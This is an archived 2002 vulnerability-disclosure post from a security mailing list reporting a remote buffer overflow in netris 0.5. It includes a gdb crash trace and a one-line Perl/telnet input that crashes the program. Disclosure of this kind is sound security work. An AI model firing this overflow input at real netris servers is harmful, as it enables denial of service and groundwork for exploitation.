Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

netris-0.5.
From: Artur Byszko / bajkero <bajkero () security hack pl>
Date: Mon, 9 Sep 2002 06:55:38 +0200
hi.

i found remote bug in latest version of netris(0.5)..

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...


***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***

Your opponent is using an old, incompatible version
of Netris.  They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4


exploit code is still under developing.. ;)

sorry for my terrible english.

best regards,
-- 
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *

Attachment: _bin
Description:

  By Date           By Thread  

Current thread:
  • netris-0.5. Artur Byszko / bajkero (Sep 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]